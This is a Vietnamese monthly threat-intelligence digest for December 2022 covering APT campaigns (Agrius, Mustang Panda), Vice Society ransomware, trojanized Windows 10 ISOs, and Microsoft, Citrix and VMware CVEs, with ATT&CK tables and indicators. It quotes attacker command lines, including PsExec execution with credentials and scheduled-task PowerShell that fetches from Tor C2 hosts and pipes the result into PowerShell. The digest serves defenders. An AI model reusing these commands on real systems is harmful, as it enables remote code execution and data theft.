Thông tin các mối đe dọa bảo mật trong tháng 12-2022

Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết.

1       Các mối đe dọa nâng cao – Advanced Threats

1.1      Fantasy – công cụ mới của Agrius được triển khai thông qua một cuộc tấn công chuỗi cung ứng

Ngày 07/12, các nhà nghiên cứu của ESET đã phát hiện ra một trình xóa mới và công cụ thực thi của nó, cả hai đều được cho là của nhóm APT Agrius, trong khi phân tích một cuộc tấn công chuỗi cung ứng đối với một nhà phát triển phần mềm của Israel.

Agrius là một nhóm mới có liên kết với Iran nhắm vào các nạn nhân ở Israel và Các Tiểu vương quốc Ả Rập Thống nhất kể từ năm 2020 . Ban đầu, nhóm đã triển khai một trính xóa, Apostle, được ngụy trang dưới dạng ransomware, nhưng sau đó đã sửa đổi Apostle thành ransomware chính thức. Agrius khai thác các lỗ hổng đã biết trong các ứng dụng kết nối Internet để cài đặt webshell, sau đó tiến hành do thám nội bộ trước khi di chuyển sang máy chủ khác và sau đó triển khai các tải trọng độc hại của chúng.

Các công cụ đầu tiên được Agrius triển khai trên các hệ thống nạn nhân là:

·         MiniDump, “chức nhận thông tin xác thực từ các kết xuất LSASS ”

·         SecretsDump, một tập lệnh Python “thực hiện các kỹ thuật khác nhau để kết xuất hàm băm từ máy tính từ xa”

·         Host2IP, một công cụ C#/.NET tùy chỉnh phân giải tên máy chủ thành địa chỉ IP.

Tên người dùng, mật khẩu và tên máy chủ được các công cụ này thu thập để Sandals phát tán và thực thi thành công trình xóa Fantasy.

Sandals là một tệp thực thi Windows 32 bit được viết bằng C#/.NET. Nó được sử dụng để kết nối với các hệ thống trong cùng một mạng thông qua SMB, để ghi một tệp batch nhằm thực thi trình xóa Fantasy, sau đó chạy tệp batch đó qua PsExec bằng chuỗi dòng lệnh sau:

  • PsExec.exe /accepteula -d -u “<username>” -p “<password>” -s “C:\<path>\<GUID>.bat”
  • Tệp batch được ghi bởi Sandals
  • Trình xóa Fantasy cũng là một tệp thực thi Windows 32 bit được viết bằng C#/.NET. Ban đầu, Fantasy tạo một mutex để đảm bảo rằng chỉ có một phiên bản đang chạy. Nó thu thập danh sách các ổ đĩa cố định nhưng loại trừ ổ đĩa có thư mục %WINDOWS% . Sau đó, nó đi vào một vòng lặp for lặp qua danh sách ổ đĩa để tạo danh sách thư mục đệ quy và sử dụng phương thức RNGCryptoServiceProvider. Phương thức GetBytes tạo một chuỗi mật mã giá trị ngẫu nhiên mạnh trong một mảng 4096 byte. Nếu đối số là 411 được cung cấp cho trình xóa, thì vòng lặp for sẽ ghi đè nội dung của mọi tệp bằng mảng byte đã nói ở trên bằng cách sử dụng vòng lặp while lồng nhau. Mặt khác, vòng lặp for chỉ ghi đè lên các tệp có phần mở rộng tệp được liệt kê trong Phụ lục.

Sau đó Fantasy gán một dấu thời gian cụ thể (2037-01-01 00:00:00) cho các tệp này và sau đó xóa tập tin.

Trong vòng lặp for, trình xóa Fantasy đếm lỗi trong thư mục hiện tại khi cố gắng ghi đè lên tệp. Nếu số lượng lỗi vượt quá 50, nó sẽ ghi một tệp batch, %WINDOWS%\Temp\<GUID>.bat, tệp này sẽ xóa thư mục chứa các tệp gây ra lỗi, sau đó tự xóa. Việc xóa tệp sau đó sẽ tiếp tục trong thư mục tiếp theo trong danh sách.

 

Sau khi vòng lặp for hoàn tất, trình xóa Fantasy sẽ tạo một tệp batch trong %WINDOWS%\Temp được gọi là registry.bat. Tệp batch xóa các khoá đăng ký sau:

·         HKCR\.EXE

·         HKCR\.dll

·         HKCR\*

Sau đó, nó chạy lệnh sau để cố xóa bộ nhớ cache của hệ thống tệp:

·         %windir%\system32\rundll32.exe advapi32.dll,ProcessIdleT task

Cuối cùng, registry.bat tự xóa chính nó (del %0).

Tiếp theo, trình xóa Fantasy xóa tất cả nhật ký sự kiện Windows và tạo một tệp batch khác, system.bat, trong %WINDOWS%\Temp, tệp này sẽ xóa đệ quy tất cả các tệp trên %SYSTEMDRIVE% , cố gắng xóa bộ nhớ cache của hệ thống tệp và tự xóa. Sau đó, Fantasy ngủ trong hai phút trước khi ghi đè lên Bản ghi khởi động chính của hệ thống .

Tiếp, trình xóa Fantasy ghi một tệp batch khác, %WINDOWS%\Temp\remover.bat, xóa trình xóa Fantasy khỏi đĩa rồi tự xóa. Sau đó, trình xóa Fantasy ngủ trong 30 giây trước khi khởi động lại hệ thống với mã lý do SHTDN_REASON_MAJOR_OTHER (0x00000000) — Other issue.

ATT&CK MATRIX

TACTIC TECHNIQUE NAME
Resource Development T1587 Develop Capabilities
Resource Development T1587.001 Develop Capabilities: Malware
Initial Access T1078.002 Valid Accounts: Domain Accounts
Initial Access T1078.003 Valid Accounts: Local Accounts
Execution T1059.003 Command and Scripting Interpreter: Windows Command Shell
Privilege Escalation T1134 Access Token Manipulation
Defense Evasion T1070.006 Indicator Removal on Host: Timestomp
Credential Access T1003 OS Credential Dumping
Discovery T1135 Network Share Discovery
Lateral Movement T1021.002 Remote Services: SMB/Windows Admin Shares
Lateral Movement T1570 Lateral Tool Transfer
Impact T1485 Data Destruction
Impact T1561.002 Disk Wipe
Impact T1561.001 Disk Wipe: Disk Content Wipe
Impact T1529 System Shutdown/Reboot

Indicators of Compromise (IoCs)

Files / hash SHA 1

1A62031BBB2C3F55D44F59917FD32E4ED2041224

820AD7E30B4C54692D07B29361AECD0BB14DF3BE

1AAE62ACEE3C04A6728F9EDC3756FABD6E342252

5485C627922A71B04D4C78FBC25985CDB163313B

DB11CBFFE30E0094D6DE48259C5A919C1EB57108

3228E6BC8C738781176E65EBBC0EB52020A44866

B3B1EDD6B80AF0CDADADD1EE1448056E6E1B3274

Nguồn: https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/

1.2     Mustang Panda tấn công các mục tiêu Châu Âu và Châu Á Thái Bình Dương

Ngày 06/12, nhóm Tình báo và Nghiên cứu Mối đe dọa của BlackBerry gần đây đã tìm thấy một tệp RAR thú vị có tiêu đề “Political Guidance for the new EU approach towards Russia.rar”.

Mustang Panda, còn được gọi là HoneyMyte, Bronze President hoặc Red Delta, là một trong những nhóm APT tích cực hoạt động hiện nay, với nhiều chiến dịch được ghi lại từ năm 2012. Nó được quy kết công khai cho các hoạt động gián điệp mạng phục vụ lợi ích của Trung Quốc.

Tệp lưu trữ RAR – “Political Guidance for the new EU approach towards Russia.rar” – phù hợp với nhiều TTP liên quan đến Mustang Panda mà trước đây đã được cả BlackBerry và các nhà cung cấp khác ghi lại.

Chủ đề chính trị của tệp RAR là một chiến thuật được kẻ đe dọa sử dụng để thu hút các mục tiêu mở tệp. Sau khi tệp lưu trữ được mở, nạn nhân sẽ thấy một thư mục có tên “_” và một tệp lối tắt có cùng tên chủ đề chính trị.

Tệp .LNK sử dụng phần mở rộng tệp kép nhằm cố gắng ngụy trang tệp lối tắt dưới dạng tài liệu với hy vọng mục tiêu sẽ mở nó trong quá trình thực thi tệp lối tắt.

Tệp lối tắt chứa một lệnh khởi động quá trình thực thi ban đầu của chuỗi tấn công:

“C:\Windows\System32\cmd.exe /c “_\___\_\___\______\_____\__\test11.bpu||(forfiles /^P %USERPROFILE%\ /S /^M “Hướng dẫn chính trị cho cách tiếp cận mới của EU đối với Nga.rar” /C “cmd /c (c:\progra~1\7-Zip\7z x -y -aoa @path||c:\progra~2\7-Zip\7z x -y -aoa @path”

Tệp LNK sẽ thực thi “test11.bpu”, đây là tệp thực thi (PE) hợp pháp có tên là “ClassicExplorerSettings.exe” thuộc Classic Shell, một tiện ích phần mềm miễn phí được sử dụng để tùy chỉnh giao diện của hệ thống Windows.

“ClassicExplorer32.dll” được đặt trong cùng thư mục với “test11.bpu” để lạm dụng thứ tự tìm kiếm sau khi tệp thực thi được gọi. Mục đích của DLL là tải tệp “ClassicExplorerLog.dat” và thực thi mã shell bên trong tệp đó. Thật thú vị, trình tải được sử dụng dường như có một sự thay đổi nhỏ trong cách mã shellcode được giải mã và thực thi.

Trình tải Mustang Panda DLL được Secureworks báo cáo hồi tháng 9 đã sử dụng API EnumThreadWindows để chuyển thực thi đến phần đầu của tệp tải trọng độc hại. Trong các mẫu gần đây hơn này, trình tải DLL sử dụng API EnumSystemCodePagesW để thực thi mã shell tương tự. Một con trỏ tới shellcode đã được giải mã sẽ được chuyển tới API EnumSystemCodePagesW dưới dạng hàm gọi lại do ứng dụng xác định, như thể hiện trong Hình 3 bên dưới. Việc sử dụng API EnumSystemCodePagesW đã được kienbigmummy đề cập trong một chủ đề Twitter và cũng được thấy trong một bài thuyết trình của Black Hat Asia. Mục đích của shellcode là giải mã và thực thi tải trọng độc hại cuối cùng – PlugX – trong bộ nhớ.

 

ATT&CK MATRIX

TACTIC TECHNIQUE NAME
Execution T1203 Exploitation for Client Execution
Execution T1106 Native API
Execution T1129 Shared Module
Execution T1559.001 Component Object Model
Execution T1204.002 Malicious File
Execution T1059.003 Windows Command Shell
Persistence/Privilege Escalation T1547.001 Registry Run Keys / Startup Folder
Defense Evasion T1574.002 DLL Side-Loading
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion T1036 Masquerading
Defense Evasion T1036.007 Double File Extension
Defense Evasion T1218 System Binary Proxy Execution
Defense Evasion T1564.001 Hidden Files and Directories
Defense Evasion T1140 Deobfuscate Decode Files or Information
Discovery T1057 Process Discovery
Discovery T1082 System Information Discovery
Discovery T1518 Software Discovery
Discovery T1033 System Owner/User Discovery
Collection T1560.001 Archive via Utility
Persistence T1547.009 Shortcut
Command and Control T1071.001 Web Protocols

Indicators of Compromise (IoCs)

Files / hash SHA 256

F70d3601fb456a18ed7e7ed599d10783447016da78234f5dca61b8bd3a084a15

C&C – IP

104.42.43.178

64.34.216.50

45.147.26.45

45.32.101.7

64.34.216.44

185.80.201.4

103.192.226.87

194.124.227.90

43.254.218.128

62.233.57.49

Nguồn: https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets?s=09

1.3     Vice Society: Lập hồ sơ về mối đe dọa dai dẳng đối với ngành giáo dục

Ngày 06/12, nhóm nghiên cứ Unit42 của Paloalto đã lập hồ sơ về Vice Society, là một băng đảng tống tiền đã tham gia vào hoạt động nổi tiếng chống lại các trường học trong năm nay. Không giống như nhiều nhóm ransomware khác như LockBit theo mô hình ransomware-as-a-service (RaaS) điển hình, hoạt động của Vice Society khác ở chỗ chúng được biết đến với việc sử dụng các nhánh của các họ ransomware có sẵn trong chuỗi tấn công của chúng, được bán trên thị trường DarkWeb. Chúng bao gồm các chủng ransomware HelloKitty (còn gọi là FiveHands) và Zeppelin. Ngoài ra Vice Society đang phát triển tải trọng tùy chỉnh của riêng chúng.

Trong năm qua, Vice Society đã vận hành các trang web trên mạng Tor bằng địa chỉ .onion sau :

vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad[.]onion

Vào ngày 20 tháng 10, địa chỉ .onion chính không hoạt động, trong khi trang web nhân bản sau vẫn hoạt động:

ssq4zimieeanazkzc5ld4v5hdibi2nzwzdibfh5n5w4pw5mcik76lzyd[.]onion

Gần đây, tiêu đề cho trang blog của nhóm có sự tương đồng với logo của một trò chơi điện tử nổi tiếng có tựa đề “Grand Theft Auto: Vice City”

Vào ngày 25 tháng 10 , địa chỉ .onion ban đầu đã hoạt động trở lại. Nó đã được cập nhật để bao gồm các phần blog bổ sung.

Khi nhóm bắt đầu hoạt động vào năm 2021, Vice Society đã sử dụng biến thể HelloKitty Ransomware làm trọng tải chính trong chuỗi lây nhiễm của họ. Họ ransomware này được phát hiện lần đầu tiên vào tháng 12 năm 2020, chủ yếu nhắm mục tiêu vào các hệ thống Windows. Biến thể này lấy tên từ mutex của nó: HELLOKITTYMutex .

Nhóm Vice Society cũng sử dụng Zeppelin ransomware trong chuỗi lây nhiễm của chúng. Sau khi thực thi, mã nhị phân ransomware tự xóa và để lại một ghi chú đòi tiền chuộc trên màn hình của máy nạn nhân có tiêu đề “!!! TẤT CẢ CÁC TẬP TIN CỦA BẠN ĐỀU ĐƯỢC MÃ HÓA!!!.TXT”. Địa chỉ email liên hệ do kẻ tấn công cung cấp khác nhau giữa các mẫu nhưng địa chỉ v-society.official@onionmail[.]org công khai và liên kết Tor .onion vẫn nhất quán.

Zeppelin cũng thực hiện các hành vi:

·         Tạo khoá đăng ký HKCU\Software\Zeppelin

·         Nối phần mở rộng có định dạng A1A-A80-4CD vào các tệp được mã hóa

·         Tạo một tệp có tên README.txt.v-society

·         Imphash: 8acb34bed3caa60cae3f08f75d53f727

·         Tạo tệp tạm thời có phần mở rộng .Zeppelin có định dạng sau – C:\Users\<User>\AppData\Local\Temp\7D3ED7F1.Zeppelin

ATT&CK MATRIX

TACTIC TECHNIQUE NAME
Initial Access T1566 Phishing
Initial Access T1078 Valid Accounts
Initial Access T1190 Exploit Public-Facing Applications
Execution T1047 Windows Management Instrumentation (WMI)
Execution T1053.005 Scheduled Task/Job
Execution T1059.001 Command and Scripting Interpreter: Powershell
Execution T1059.003 Command and Scripting Interpreter: Command Shell
Persistence T1543.003 Modify System Process
Persistence T1547.001 Registry Run Keys/Startup Folder
Persistence T1574.002 DLL Side-Loading
Privilege Escalation T1068 Exploitation for Privilege Escalation
Defense Evasion T1036 Masquerading
Defense Evasion T1055 Process Injection
Defense Evasion T1070 Indicator Removal on Host
Defense Evasion T1112 Modify Registry
Defense Evasion T1497 Sandbox Evasion
Defense Evasion T1562.001 Impair Defenses: Disable or Modify Tools
Credential Access T1003 OS Credential Dumping
Credential Access T1003.001 OS Credential Dumping: LSASS Memory
Credential Access T1003.003 OS Credential Dumping: NTDS
Discovery T1046 Network Service Discovery
Discovery T1482 Domain Trust Discovery
Lateral Movement T1021 Remote Services
Lateral Movement T1021.002 Remote Services: SMB/Windows Admin Shares
Lateral Movement T1080 Taint Shared Content
Lateral Movement T1570 Lateral Tool Transfer
Exfiltration T1020 Automated Exfiltration
Exfiltration T1041 Exfiltration over C2 Channel
Exfiltration T1048 Exfiltration Over Alternative Protocol
Exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Command and Control T1219 Remote Access Software
Impact T1486 Data Encrypted for Impact
Impact T1531 Account Access Removal

Indicators of Compromise (IoCs)

Files / hash SHA 256

643a3121166cd1ee5fc6848f099be7c7c24d36f5922f58052802b91f032a5f0f

754f2022b72da704eb8636610c6d2ffcbdae9e8740555030a07c8c147387a537

78efe6f5a34ba7579cfd8fc551274029920a9086cb713e859f60f97f591a7b04

16a0054a277d8c26beb97850ac3e86dd0736ae6661db912b8782b4eb08cfd36e

4a4be110d587421ad50d2b1a38b108fa05f314631066a2e96a1c85cc05814080

307877881957a297e41d75c84e9a965f1cd07ac9d026314dcaff55c4da23d03e

faa79c796c27b11c4f007023e50509662eac4bca99a71b26a9122c260abfb3c6

dd89d939c941a53d6188232288a3bd73ba9baf0b4ca6bf6ccca697d9ee42533f

4440763b18d75a0f9de30b1c4c2aeb3f827bc4f5ea9dd1a2aebe7e5b23cfdf94

24efa10a2b51c5fd6e45da6babd4e797d9cae399be98941f950abf7b5e9a4cd7

bafd3434f3ba5bb9685e239762281d4c7504de7e0cfd9d6394e4a85b4882ff5d

aa7e2d63fc991990958dfb795a0aed254149f185f403231eaebe35147f4b5ebe

001938ed01bfde6b100927ff8199c65d1bff30381b80b846f2e3fe5a0d2df21d

Ab440c4391ea3a01bebbb651c80c27847b58ac928b32d73ed3b19a0b17dd7e75

Email

vicesociety@onionmail[.]org

v-society.official@onionmail[.]org

LarryGold@onionmail[.]org

MollyThomson@onionmail[.]org

BruceBoyle@onionmail[.]org

SylvesterJones@onionmail[.]org

brendaevans4454@onionmail[.]org

warreinolds77@onionmail[.]org

DaltonReed@onionmail[.]org

FreddieFerrell@onionmail[.]org

lewiselsberry@onionmail[.]org

inezeng@onionmail[.]org

lonnieguzman@onionmail[.]org

thomasmoore@onionmail[.]org

C&C

vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad[.]onion

Qu5dci2k25x2imgki2dbhcwegqqsqsrjj5d3ugcc5kpsgbtj2psaedqd[.]onion

Wavbeudogz6byhnardd2lkp2jafims3j7tj6k6qnywchn2csngvtffqd[.]onion

gunyhng6pabzcurl7ipx2pbmjxpvqnu6mxf2h3vdeenam34inj4ndryd[.]onion

Nguồn: https://unit42.paloaltonetworks.com/vice-society-targets-education-sector/

2     Malware

2.1     Phân tích trojan giả mạo file cài đặt hệ điều hành windows 10 nhắm tới chính phủ Ukraine

Gần đây, Mandiant phát hiện một số mẫu mã độc giả mạo các file ISO lưu trữ trên các trang web tiếng Ukraina và tiếng Nga. Sau khi file ISO được cài đăt, nó sẽ thu thập thông tin hệ thống và triển khai thêm các payload mới là các backdoor bao gồm STOWAWAY, BEACON và SPAREPART

Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4)

Được tải xuống từ địa chỉ: https://toloka.to/t657016#1873175

File ISO sau khi cài đặt sẽ thực hiện thay đổi 2 schedule tasks hợp pháp trong windows là GatherNetworkInfo và Consolidator. Với mục đích tải xuống payload mới từ địa chỉ TOR C2 và thực thi bằng powershell cụ thể như sau:

·         C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5:  ed7ab9c74aad08b938b320765b5c380d)

§  Last edit date: 2022-05-11 12:58:55

§  Executes: powershell.exe (curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H (‘h:’+(wmic csproduct get UUID)))

·         C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5:  1433dd88edfc9e4b25df370c0d8612cf)

§  Last edit date: 2022-05-11 12:58:12

§  Executes: powershell.exe curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion.ws -H (‘h:’+(wmic csproduct get UUID)) | powershell.exe

Bên trong file ISO có thêm một file bashscript có tên SetupComplete.cmd, có nhiệm vụ vô hiệu hóa một số dịch vụ (services) và tác vụ (task), vô hiệu hóa các cập nhật Windows, chặn địa chỉ IP và các tên miền liên quan đến các dịch vụ hợp phát của Microsoft, vô hiệu hóa OneDrive và active license Windows

·         SetupComplete.cmd (MD5: 84B54D2D022D3DF9340708B992BF6669)

§  Batch script có nhiệm vụ vô hiệu hóa một số dịch vụ (services) và tác vụ (task) trên Windows

·         SetupComplete.cmd (MD5: 67C4B2C45D4C5FD71F6B86FA0C71BDD3)

§  Batch script có nhiệm vụ vô hiệu hóa một số dịch vụ (services) và tác vụ (task) trên Windows

·         SetupComplete.cmd (MD5: 5AF96E2E31A021C3311DFDA200184A3B)

§  Batch script có nhiệm vụ vô hiệu hóa một số dịch vụ (services) và tác vụ (task) trên Windows

Để theo dõi, kẻ tấn công sử dụng UUID của thiết bị làm mã định danh để theo dõi nạn nhân. Các thông tin thu thập thông bao gồm thông tin hệ thống, danh sách thư mục và vị trí địa lý. Sau khi xác định thiết bị có khả năng chứa các thông tin có giá trị, kẻ tấn công có thể thực hiện triển khi thêm các payload mới:

·         Triển khai các công cụ để cho phép đánh cắp dữ liệu (như TOR và Sheret)

·         Triển khai các backdoor có khả năng cung cấp quyền truy ở máy nạn nhân (như SPAREPART)

·         Triển khai các backdoor để có thể sử dụng các chức năng bổ sung (như BEACON và STOWAWAY

Sparepart backdoor được triển khai thông qua các schedule tasks đã đề cập trước đó. Được thực thi dưới dạng Windows Service DLL, sau khi thực thi mã độc sẽ lấy UUID của thiết bị sử dụng trong giao tiếp với máy chủ C2

Bằng cách sử dụng các hàm API WinHttp với user agent được fix cứng “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0”, mã độc sẽ tải xuống payload mới với URL được cung cấp

Bên cạnh SPAREPART, kẻ tấn công còn triển khai thêm mã độc khác thông qua lập lịch có tên AzureSync. Sử dụng rundll32 để load DLL độc hại AzureSettingSync.dll. DLl này được cấu hình để giao tiếp với địa chỉ cdnworld[.]org

·         C:\Windows\System32\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c)

§  BEACON backdoor

§  Original name: tr2fe.dll

§  Compiled on: 1970/01/01 00:00:00

§  Dropped by 529388109f4d69ce5314423242947c31 (BEACON)

§  Connects to https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–

§  Connects to https://cdnworld[.]org/34702–general/sync/42823419-cdn

Indicators of Compromise (IoCs)

File

AzureSettingSync.dll MD5: 59a3129b73ba4756582ab67939a2fe3c

splwow86.exe MD5: 0f06afbb4a2a389e82de6214590b312b

%LOCALAPPDATA%\SODUsvc.exe MD5: a8e7d8ec0f450037441ee43f593ffc7c

Malicious Windows Image Tor C2:

56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid[.]onion[.]moe

ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]moe

ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]ws

C2:

https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–

https://cdnworld[.]org/34702–general/sync/42823419-cdn

193.142.30[.]166:443

91.205.230[.]66:8443

Nguồn tham khảo: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

3     CVE và các khuyến nghị bảo mật

3.1     Microsoft Patch Tuesday – December 2022

Trong tháng 12, Microsoft đã phát hành các bản vá cho 52 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Azure; Office và Office Components; SysInternals; Microsoft Edge (Chromium-based); SharePoint Server; và.NET framework. Trong đó có 6 lỗ hổng được đánh giá mức độ Nghiêm trọng, 43 lỗ hổng được đánh giá là Improtant và 3 lỗ hổng được đánh giá là Moderate.

Dưới đây là một số CVE nổi bật được đánh giá ở mức độ Critical và Improtant:

3.1.1     CVE-2022-44690/ CVE-2022-44693 – Microsoft SharePoint Server Remote Code Execution Vulnerability

CVSS v3: 8.8/10

Mô tả: Lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng yêu cầu xác thực cùng quyền Manage Lists trong SharePoint

Phiên bản ảnh hưởng:

Microsoft SharePoint Foundation 2013 Service Pack 1

Microsoft SharePoint Server Subscription Edition

Microsoft SharePoint Server 2019

Microsoft SharePoint Enterprise Server 2013 Service Pack 1

Microsoft SharePoint Enterprise Server 2013 Service Pack 1

Microsoft SharePoint Enterprise Server 2016

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-44690

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-44693

3.1.2    CVE-2022-41076 – PowerShell Remote Code Execution Vulnerability.

CVSS v3: 8.5/10

Mô tả: Lỗ hổng cho phép kẻ tấn công thực thi các câu lệnh trên hệ thống bị ảnh hưởng, được cho là cũng ảnh hưởng đến các sản phẩm sử dụng PowerShell Remoting Session Configuration bao gồm Exchange on-premises cũng như Exchange Online, Skype for Business Server

Phiên bản ảnh hưởng:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows RT 8.1

Windows 8.1 for x64-based systems

Windows 8.1 for 32-bit systems

Windows 7 for x64-based Systems Service Pack 1

Windows 7 for 32-bit Systems Service Pack 1

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows 10 Version 22H2 for 32-bit Systems

Windows 10 Version 22H2 for ARM64-based Systems

Windows 10 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 for ARM64-based Systems

Windows 11 for x64-based Systems

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server 2022 Datacenter: Azure Edition

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for x64-based Systems

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

PowerShell 7.3

PowerShell 7.2

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41076

3.1.3    CVE-2022-44704 – Microsoft Windows Sysmon Elevation of Privilege Vulnerability

CVSS v3: 7.8/10

Mô tả: Lỗ hổng cho phép kẻ tấn công leo thang đặc quyền lên quyền SYSTEM

Phiên bản ảnh hưởng:

          Windows Sysmon

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-44704

3.2   Ứng Dụng Web Và Các Sản Phẩm Khác

3.2.1    CVE-2022-27518 – Citrix Application Delivery Controller (ADC) and Gateway Authentication Bypass Vulnerability

CVSS v3: 9.8/10

Mô tả: Lỗ hổng cho phép kẻ tấn công không cần xác thực thực thi mã từ xa trên thiết bị bị ảnh hưởng. Lỗ hổng đang được sử dụng bởi các nhóm tấn công

Phiên bản ảnh hưởng:

Citrix ADC and Citrix Gateway 13.0 before 13.0-58.32

Citrix ADC and Citrix Gateway 12.1 before 12.1-65.25

Citrix ADC 12.1-FIPS before 12.1-55.291

Citrix ADC 12.1-NDcPP before 12.1-55.291

Ghi chú: Citrix ADC and Citrix Gateway versions 13.1 không bị ảnh hưởng

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://www.citrix.com/blogs/2022/12/13/critical-security-update-now-available-for-citrix-adc-citrix-gateway/

3.2.2   CVE-2022-31700 – Remote Code Execution Vulnerability

CVSS v3: 7.2/10

Mô tả: Lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên thiết bị bị ảnh hưởng.  Khai thác lỗ hổng yêu cầu xác thực

Phiên bản ảnh hưởng:

          VMware Workspace ONE Access và Identity Manager

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://www.vmware.com/security/advisories/VMSA-2022-0032.html